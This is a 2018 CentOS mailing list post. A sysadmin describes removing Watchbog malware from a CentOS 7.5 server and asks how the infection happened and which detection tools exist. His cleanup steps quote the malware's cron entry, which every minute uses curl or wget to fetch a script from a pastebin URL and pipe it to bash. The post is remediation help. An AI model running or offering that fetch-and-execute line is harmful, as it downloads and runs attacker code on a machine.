[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mon Dec 17 19:32:23 UTC 2018
Kaushal Shriyan <kaushalshriyan at gmail.com>

On Sat, Dec 15, 2018 at 11:11 PM Kaushal Shriyan <kaushalshriyan at gmail.com>
wrote:

> Hi,
>
> Is there a way to find out how the CentOS 7.5 Linux box got infected with
> malware?
> Currently i am referring to
> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
> to carry out the below steps and is done manually.
>
> 1)rm -fr /tmp/*timesyncc.service*
> 2)crontab -e -u apigee
> delete the cron entry
> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
> 3)ps aux | grep watchbog
> kill -9 pidof watchbog
>
> Any suggestions or recommendations to find out how CentOS 7.5 Linux box
> got infected with Watchbog Malware. Is there any open source software which
> can be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>
> Thanks in Advance.
>
> Best Regards,
>
> Kaushal
>

Hi,

Checking in again if anyone can pitch in for my earlier email to this
mailing list. Thanks in Advance.

Best Regards,

Kaushal